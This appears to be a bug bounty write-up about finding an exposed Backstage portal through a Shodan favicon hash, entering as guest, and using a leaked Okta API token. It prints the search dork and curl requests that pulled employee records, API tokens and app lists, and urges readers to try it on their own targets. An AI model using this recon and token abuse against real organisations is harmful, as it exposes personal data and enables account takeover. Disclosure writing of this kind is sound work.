The Art of Pwning Okta For Profit and Fun

4 min read6 days ago

In July, while hunting in a Hackerone program I found a vulnerability allowing me to see all more than 10K employee PII that had okta account.

Discovery of Backstage

I cannot disclose the program name, lets call the program as example.com. example.com had only www.example.com , notexample.com and few subdomains for notexample.com in scope. While approaching new program I always look how big is their asset by looking in shodan.

While looking at the result, I noticed a strange favicon.ico logo and opened it. The application was using backstage https://backstage.io/ . You may test this vulnerability issue across your targets. Below is the favicon hash for the application.

http.favicon.hash:1117983176

The application had 2 ways to signin using guest and Okta. Without 2nd thought I clicked on Enter as guest and logged in.

Verifying the Host

However, I was not able to confirm if the host actually belonged to the company and should proceed further. I found a GitHub username on the CI/CD page on /catalog page that required Microsoft authentication.

I searched the username on GitHub, went to his linkedin profile through Github and found that he is working as a Devops Engineer in example.com since x years.

After confirming the host belonged to example.com, I navigated across the host to see if I could see any page containing sensitive information with guest access.

On the /create page, I found out that I could deploy a node.js lamda function using Github Actions which also I included in the vulnerability report. I began enumerating the application endpoints further.

Exposing the Okta Token

After a while after navigating to https://host/dev/config page I could see the Okta access token. The page had the SSO provider configuration disclosed.

With 1% hope that the token might be valid, I searched the Okta documentation to craft few http requests trying to leak sensitive information.

Exploitation

I then used following requests to retrieve okta users information. I was able to retrieve more than 10K employee PII including First Name, Last Name, Email Address, API token for all users, groups,etc. I was also able to deactivate/reactivate employee okta users, delete users, add new security device for users.

To get Users:

curl -v -X GET -H "Accept: application/json"
 -H "Content-Type: application/json" -H "Authorization:
 SSWS <TOKEN HERE>" "https://example.oktapreview.com/api/v1/users?limit=25"

To Get API Tokens:

curl -v -X GET -H "Accept: application/json" -H
 "Content-Type: application/json" -H
 "Authorization: SSWS <TOKEN_HERE>"
 "https://example.oktapreview.com/api/v1/api-tokens"

To get Applications:

curl -v -X GET -H "Accept: application/json" -H 
"Content-Type: application/json" -H
 "Authorization: SSWS <TOKEN_HERE>" "https://example.oktapreview.com/api/v1/apps"

You may refer to official Okta documentation here to exploit further https://developer.okta.com/docs/reference/ .